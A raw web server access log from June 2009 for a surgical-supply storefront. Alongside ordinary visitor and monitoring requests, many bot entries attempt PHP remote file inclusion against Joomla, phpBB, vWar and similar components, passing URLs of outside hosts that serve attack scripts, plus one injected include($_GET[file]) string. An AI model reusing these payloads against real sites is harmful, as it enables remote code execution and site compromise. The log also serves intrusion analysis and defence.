174.142.68.168 - - [20/Jun/2009:00:35:13 -0400] "GET /logs//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://free.7host05.com/tachatte69/id.txt???? HTTP/1.1" 404 213 "-" "libwww-perl/5.826"
77.221.130.17 - - [20/Jun/2009:00:35:13 -0400] "GET /logs/access_log.Q109052300/default.php?arquivo=http://omit.ru/yandex_628dc1f3167e2080.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
174.142.68.168 - - [20/Jun/2009:00:35:14 -0400] "GET /logs/access_log.Q109061100//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://free.7host05.com/tachatte69/id.txt???? HTTP/1.1" 404 235 "-" "libwww-perl/5.826"
66.233.122.231 - - [20/Jun/2009:00:35:14 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.31 Safari/530.5"
66.233.122.231 - - [20/Jun/2009:00:35:14 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.31 Safari/530.5"
74.55.29.146 - - [20/Jun/2009:00:35:21 -0400] "GET /logs/access_log.Q109051800/include/write.php?dir=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
74.55.29.146 - - [20/Jun/2009:00:35:24 -0400] "GET /logs/access_log.Q109051300/include/write.php?dir=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
75.125.245.26 - - [20/Jun/2009:00:35:30 -0400] "GET /logs/access_log.Q109060600%20%20/lostpasswd.php?env[include_prefix]=http://www.politicalroundtable.com/plugins/1.gif?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
217.116.84.254 - - [20/Jun/2009:00:35:35 -0400] "GET /logs/access_log.Q109051800//include/write.php?dir=http://www.vasterviksdjurklinik.se/components/chid.txt??? HTTP/1.1" 404 243 "-" "libwww-perl/5.803"
217.116.84.254 - - [20/Jun/2009:00:35:36 -0400] "GET //include/write.php?dir=http://www.vasterviksdjurklinik.se/components/chid.txt??? HTTP/1.1" 404 216 "-" "libwww-perl/5.803"
217.116.84.254 - - [20/Jun/2009:00:35:36 -0400] "GET /logs//include/write.php?dir=http://www.vasterviksdjurklinik.se/components/chid.txt??? HTTP/1.1" 404 221 "-" "libwww-perl/5.803"
77.221.130.17 - - [20/Jun/2009:00:36:00 -0400] "GET /logs/index1.php?inc=http://omit.ru/yandex_628dc1f3167e2080.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
77.221.130.17 - - [20/Jun/2009:00:36:00 -0400] "GET /logs/access_log.Q109050700%20%20/index1.php?inc=http://omit.ru/yandex_628dc1f3167e2080.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
77.221.130.17 - - [20/Jun/2009:00:36:00 -0400] "GET /index1.php?inc=http://omit.ru/yandex_628dc1f3167e2080.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
66.233.122.231 - - [20/Jun/2009:00:36:12 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/contact.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.31 Safari/530.5"
174.142.68.168 - - [20/Jun/2009:00:36:33 -0400] "GET /logs/error_log.Q109052100%20//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://free.7host05.com/tachatte69/id.txt???? HTTP/1.1" 404 235 "-" "libwww-perl/5.826"
66.233.122.231 - - [20/Jun/2009:00:36:43 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.31 Safari/530.5"
62.149.226.223 - - [20/Jun/2009:00:36:45 -0400] "GET /logs/access_log.Q109061100%20%20/lostpasswd.php?env[include_prefix]=http://www.politicalroundtable.com/plugins/1.gif?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
195.64.174.74 - - [20/Jun/2009:00:36:49 -0400] "GET /logs/access_log.Q109052900/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://colegiopenacorada.com/xoops_lib/modules/pw.txt??? HTTP/1.1" 404 261 "-" "libwww-perl/5.803"
195.64.174.74 - - [20/Jun/2009:00:36:49 -0400] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://colegiopenacorada.com/xoops_lib/modules/pw.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.803"
195.64.174.74 - - [20/Jun/2009:00:36:49 -0400] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://colegiopenacorada.com/xoops_lib/modules/pw.txt??? HTTP/1.1" 404 239 "-" "libwww-perl/5.803"
217.116.84.254 - - [20/Jun/2009:00:36:54 -0400] "GET /logs/error_log.Q109051800//include/write.php?dir=http://www.vasterviksdjurklinik.se/components/chid.txt??? HTTP/1.1" 404 242 "-" "libwww-perl/5.803"
87.230.22.39 - - [20/Jun/2009:00:37:02 -0400] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://kotz.org/images/extras/id.txt??? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
87.230.22.39 - - [20/Jun/2009:00:37:02 -0400] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://kotz.org/images/extras/id.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
87.230.22.39 - - [20/Jun/2009:00:37:02 -0400] "GET /logs/access_log.Q109060700//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://kotz.org/images/extras/id.txt??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
99.29.79.26 - - [20/Jun/2009:00:37:11 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/4.0 (compatible; GoogleToolbar 6.1.1715.1442; Windows 6.0; MSIE 7.0.6001.18000)"
99.29.79.26 - - [20/Jun/2009:00:37:11 -0400] "GET /favicon.gif HTTP/1.1" 404 209 "-" "Mozilla/4.0 (compatible; GoogleToolbar 6.1.1715.1442; Windows 6.0; MSIE 7.0.6001.18000)"
99.29.79.26 - - [20/Jun/2009:00:37:11 -0400] "GET /CGI-BIN/favicon.ico HTTP/1.1" 404 217 "-" "Mozilla/4.0 (compatible; GoogleToolbar 6.1.1715.1442; Windows 6.0; MSIE 7.0.6001.18000)"
99.29.79.26 - - [20/Jun/2009:00:37:12 -0400] "GET /CGI-BIN/favicon.gif HTTP/1.1" 404 217 "-" "Mozilla/4.0 (compatible; GoogleToolbar 6.1.1715.1442; Windows 6.0; MSIE 7.0.6001.18000)"
195.64.174.74 - - [20/Jun/2009:00:37:20 -0400] "GET /logs/access_log.Q109061100/convert/mvcw.php?step=1&vwar_root=http://colegiopenacorada.com/xoops_lib/modules/pw.txt??? HTTP/1.1" 404 241 "-" "libwww-perl/5.803"
195.64.174.74 - - [20/Jun/2009:00:37:20 -0400] "GET /convert/mvcw.php?step=1&vwar_root=http://colegiopenacorada.com/xoops_lib/modules/pw.txt??? HTTP/1.1" 404 214 "-" "libwww-perl/5.803"
195.64.174.74 - - [20/Jun/2009:00:37:20 -0400] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://colegiopenacorada.com/xoops_lib/modules/pw.txt??? HTTP/1.1" 404 219 "-" "libwww-perl/5.803"
62.149.226.223 - - [20/Jun/2009:00:37:26 -0400] "GET /logs/access_log.Q109061200%20%20/lostpasswd.php?env[include_prefix]=http://www.politicalroundtable.com/plugins/1.gif?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
83.98.209.71 - - [20/Jun/2009:00:37:40 -0400] "GET //components/com_smf/smf.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
83.98.209.71 - - [20/Jun/2009:00:37:40 -0400] "GET /logs//components/com_smf/smf.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
83.98.209.71 - - [20/Jun/2009:00:37:40 -0400] "GET /logs/access_log.Q109060300//components/com_smf/smf.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
209.59.12.99 - - [20/Jun/2009:00:37:47 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
195.64.174.74 - - [20/Jun/2009:00:37:48 -0400] "GET /logs/access_log.Q109053000/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://colegiopenacorada.com/xoops_lib/modules/pw.txt??? HTTP/1.1" 404 261 "-" "libwww-perl/5.803"
77.221.130.17 - - [20/Jun/2009:00:38:19 -0400] "GET /logs/access_log.Q109052300%20%20/index1.php?inc=http://omit.ru/yandex_628dc1f3167e2080.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
83.98.209.71 - - [20/Jun/2009:00:38:45 -0400] "GET /logs/access_log.Q109050300//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
83.98.209.71 - - [20/Jun/2009:00:39:06 -0400] "GET /logs/access_log.Q109051600//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
87.230.22.39 - - [20/Jun/2009:00:39:27 -0400] "GET /logs/access_log.Q109060500///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://kotz.org/images/extras/id.txt??? HTTP/1.1" 404 298 "-" "Mozilla/5.0"
75.125.245.26 - - [20/Jun/2009:00:40:20 -0400] "GET /?sourcedir=http://www.politicalroundtable.com/plugins/1.gif?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
75.125.245.26 - - [20/Jun/2009:00:40:20 -0400] "GET /logs/access_log.Q109052300%20%20/?sourcedir=http://www.politicalroundtable.com/plugins/1.gif?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
75.125.245.26 - - [20/Jun/2009:00:40:20 -0400] "GET /logs/?sourcedir=http://www.politicalroundtable.com/plugins/1.gif?? HTTP/1.1" 200 6242 "-" "Mozilla/5.0"
74.124.194.104 - - [20/Jun/2009:00:40:42 -0400] "GET /logs/errors.php?error=http://www.vasterviksdjurklinik.se/components/chid.txt??? HTTP/1.1" 404 213 "-" "libwww-perl/5.810"
74.124.194.104 - - [20/Jun/2009:00:40:42 -0400] "GET /errors.php?error=http://www.vasterviksdjurklinik.se/components/chid.txt??? HTTP/1.1" 404 208 "-" "libwww-perl/5.810"
74.124.194.104 - - [20/Jun/2009:00:40:42 -0400] "GET /logs/access_log.Q109051800/errors.php?error=http://www.vasterviksdjurklinik.se/components/chid.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.810"
78.159.121.30 - - [20/Jun/2009:00:41:08 -0400] "GET /logs/access_log.Q109051800/errors.php?error=http://www.vasterviksdjurklinik.se/components/chid.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.826"
78.159.121.30 - - [20/Jun/2009:00:41:08 -0400] "GET /errors.php?error=http://www.vasterviksdjurklinik.se/components/chid.txt??? HTTP/1.1" 404 208 "-" "libwww-perl/5.826"
78.159.121.30 - - [20/Jun/2009:00:41:09 -0400] "GET /logs/errors.php?error=http://www.vasterviksdjurklinik.se/components/chid.txt??? HTTP/1.1" 404 213 "-" "libwww-perl/5.826"
200.105.207.244 - - [20/Jun/2009:00:41:20 -0400] "GET /logs/access_log.Q109052500//components/com_simpleboard/image_upload.php?sbp=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
75.125.245.26 - - [20/Jun/2009:00:41:21 -0400] "GET /logs/access_log.Q109061000%20%20/?sourcedir=http://www.politicalroundtable.com/plugins/1.gif?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
74.124.194.104 - - [20/Jun/2009:00:41:28 -0400] "GET /logs/access_log.Q109050700/errors.php?error=http://www.vasterviksdjurklinik.se/components/chid.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.810"
78.159.121.30 - - [20/Jun/2009:00:41:47 -0400] "GET /logs/access_log.Q109050700/errors.php?error=http://www.vasterviksdjurklinik.se/components/chid.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.826"
66.249.134.74 - - [20/Jun/2009:00:41:56 -0400] "GET //modules/Forums/admin/admin_styles.php?phpbb_root_path=http://www.inboxstorage.nl/images/tick.gif?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
66.249.134.74 - - [20/Jun/2009:00:41:56 -0400] "GET /logs/access_log.Q109051800%20%20//modules/Forums/admin/admin_styles.php?phpbb_root_path=http://www.inboxstorage.nl/images/tick.gif?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
66.249.134.74 - - [20/Jun/2009:00:41:56 -0400] "GET /logs//modules/Forums/admin/admin_styles.php?phpbb_root_path=http://www.inboxstorage.nl/images/tick.gif?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
66.249.71.54 - - [20/Jun/2009:00:42:30 -0400] "GET /images/688275_bonemill_150.jpg HTTP/1.1" 200 4513 "-" "Googlebot-Image/1.0"
209.59.12.99 - - [20/Jun/2009:00:42:49 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
195.64.174.74 - - [20/Jun/2009:00:42:59 -0400] "GET /logs/access_log.Q109052900/convert/mvcw.php?step=1&vwar_root=http://colegiopenacorada.com/xoops_lib/modules/pw.txt??? HTTP/1.1" 404 241 "-" "libwww-perl/5.803"
88.191.89.138 - - [20/Jun/2009:00:44:06 -0400] "GET //modules/Forums/admin/admin_styles.php?phpbb_root_path=http://www.inboxstorage.nl/images/tick.gif?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
88.191.89.138 - - [20/Jun/2009:00:44:06 -0400] "GET /logs/access_log.Q109051800%20%20//modules/Forums/admin/admin_styles.php?phpbb_root_path=http://www.inboxstorage.nl/images/tick.gif?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
88.191.89.138 - - [20/Jun/2009:00:44:06 -0400] "GET /logs//modules/Forums/admin/admin_styles.php?phpbb_root_path=http://www.inboxstorage.nl/images/tick.gif?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
124.0.146.100 - - [20/Jun/2009:00:45:15 -0400] "GET /logs/error_log.Q109051900%20%20//index.php?autoLoadConfig%5b999%5d%5b0%5d%5bautoType%5d=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
200.105.207.244 - - [20/Jun/2009:00:45:38 -0400] "GET //components/com_smf/smf.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
200.105.207.244 - - [20/Jun/2009:00:45:38 -0400] "GET /logs//components/com_smf/smf.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
200.105.207.244 - - [20/Jun/2009:00:45:38 -0400] "GET /logs/access_log.Q109060300//components/com_smf/smf.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
195.64.174.74 - - [20/Jun/2009:00:47:11 -0400] "GET //modules/vwar/admin/admin.php?vwar_root=http://colegiopenacorada.com/xoops_lib/modules/pw.txt??? HTTP/1.1" 404 227 "-" "libwww-perl/5.803"
209.59.12.99 - - [20/Jun/2009:00:47:50 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.233.122.231 - - [20/Jun/2009:00:47:52 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):13+RNSUBS%20(S0040):0 HTTP/1.1" 200 50278 "http://www.acesurgical.com/caso4.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.31 Safari/530.5"
66.233.122.231 - - [20/Jun/2009:00:47:53 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 200 984 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):13+RNSUBS%20(S0040):0" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.31 Safari/530.5"
66.233.122.231 - - [20/Jun/2009:00:47:53 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 200 1970 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):13+RNSUBS%20(S0040):0" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.31 Safari/530.5"
66.233.122.231 - - [20/Jun/2009:00:47:53 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 200 1729 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):13+RNSUBS%20(S0040):0" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.31 Safari/530.5"
66.233.122.231 - - [20/Jun/2009:00:47:53 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 200 1531 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):13+RNSUBS%20(S0040):0" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.31 Safari/530.5"
66.233.122.231 - - [20/Jun/2009:00:47:54 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 200 1768 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):13+RNSUBS%20(S0040):0" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.31 Safari/530.5"
66.233.122.231 - - [20/Jun/2009:00:47:54 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 200 5036 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):13+RNSUBS%20(S0040):0" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.31 Safari/530.5"
66.233.122.231 - - [20/Jun/2009:00:47:54 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 200 764 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):13+RNSUBS%20(S0040):0" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.31 Safari/530.5"
66.233.122.231 - - [20/Jun/2009:00:47:54 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 200 1459 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):13+RNSUBS%20(S0040):0" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.31 Safari/530.5"
66.233.122.231 - - [20/Jun/2009:00:47:54 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 200 1160 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):13+RNSUBS%20(S0040):0" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.31 Safari/530.5"
66.233.122.231 - - [20/Jun/2009:00:47:54 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 200 1250 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):13+RNSUBS%20(S0040):0" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.31 Safari/530.5"
66.233.122.231 - - [20/Jun/2009:00:47:54 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 200 1367 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):13+RNSUBS%20(S0040):0" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.31 Safari/530.5"
66.233.122.231 - - [20/Jun/2009:00:47:54 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 200 1235 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):13+RNSUBS%20(S0040):0" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.31 Safari/530.5"
66.233.122.231 - - [20/Jun/2009:00:47:54 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 200 2237 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):13+RNSUBS%20(S0040):0" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.31 Safari/530.5"
66.233.122.231 - - [20/Jun/2009:00:47:54 -0400] "GET /images/blend.jpg HTTP/1.1" 200 405 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):13+RNSUBS%20(S0040):0" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.31 Safari/530.5"
66.233.122.231 - - [20/Jun/2009:00:47:54 -0400] "GET /images/pf-a.gif HTTP/1.1" 200 798 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):13+RNSUBS%20(S0040):0" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.31 Safari/530.5"
66.233.122.231 - - [20/Jun/2009:00:47:54 -0400] "GET /images/space.gif HTTP/1.1" 200 43 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):13+RNSUBS%20(S0040):0" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.31 Safari/530.5"
66.233.122.231 - - [20/Jun/2009:00:47:54 -0400] "GET /images/items/CALCIUMSULFATE_THUMB.JPG HTTP/1.1" 200 2715 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):13+RNSUBS%20(S0040):0" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.31 Safari/530.5"
66.233.122.231 - - [20/Jun/2009:00:47:54 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 200 1296 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):13+RNSUBS%20(S0040):0" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.31 Safari/530.5"
66.233.122.231 - - [20/Jun/2009:00:47:54 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 200 1473 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):13+RNSUBS%20(S0040):0" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.31 Safari/530.5"
66.233.122.231 - - [20/Jun/2009:00:47:54 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 200 1396 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):13+RNSUBS%20(S0040):0" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.31 Safari/530.5"
66.233.122.231 - - [20/Jun/2009:00:47:54 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 200 1392 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):13+RNSUBS%20(S0040):0" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.31 Safari/530.5"
66.233.122.231 - - [20/Jun/2009:00:47:54 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 200 1354 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):13+RNSUBS%20(S0040):0" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.31 Safari/530.5"
66.233.122.231 - - [20/Jun/2009:00:47:55 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 200 1156 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):13+RNSUBS%20(S0040):0" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.31 Safari/530.5"
66.233.122.231 - - [20/Jun/2009:00:47:55 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 200 1097 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):13+RNSUBS%20(S0040):0" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.31 Safari/530.5"
66.233.122.231 - - [20/Jun/2009:00:47:55 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 200 1089 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):13+RNSUBS%20(S0040):0" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.31 Safari/530.5"
66.233.122.231 - - [20/Jun/2009:00:47:55 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 200 1195 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):13+RNSUBS%20(S0040):0" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.31 Safari/530.5"
